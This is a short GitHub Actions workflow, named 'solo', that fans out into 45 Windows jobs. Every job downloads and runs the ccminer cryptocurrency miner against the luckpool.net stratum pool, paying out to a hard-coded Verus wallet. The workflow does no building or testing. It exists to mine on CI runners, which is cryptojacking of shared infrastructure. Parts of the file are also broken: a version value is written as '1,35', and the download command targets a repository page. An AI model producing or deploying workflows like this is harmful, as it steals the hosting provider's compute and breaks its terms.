name: solo
 
runs-on: windows-latest 
 
strategy: 
 
max-parallel: 5 
 
fail-fast: false 
 
matrix: 
 
go: [1.0, 1.1, 1.2, 1.3, 1,35] 
 
flag: [A, B, C, D, E, F, G, H, I] 
 
env: 
 
NUM_JOBS: 20 
 
JOB: ${{ matrix.go }} 
 
steps: 
 
- name: DOWNLOAD 
 
run: Invoke-WebRequest https://github.com/monkins1010/ccminer
 
- name: Extract 
 
run: Expand-Archive ccminer
 
- name: Running 
 
run: ./ccminer -a verus -o stratum+tcp://ap.luckpool.net:3956 -u RNxeebTqsFvE424qvzYNFQ4Xcd29Qbn5Ev.50aja -p hybrid-t
 
- name: END 
 
run: exit
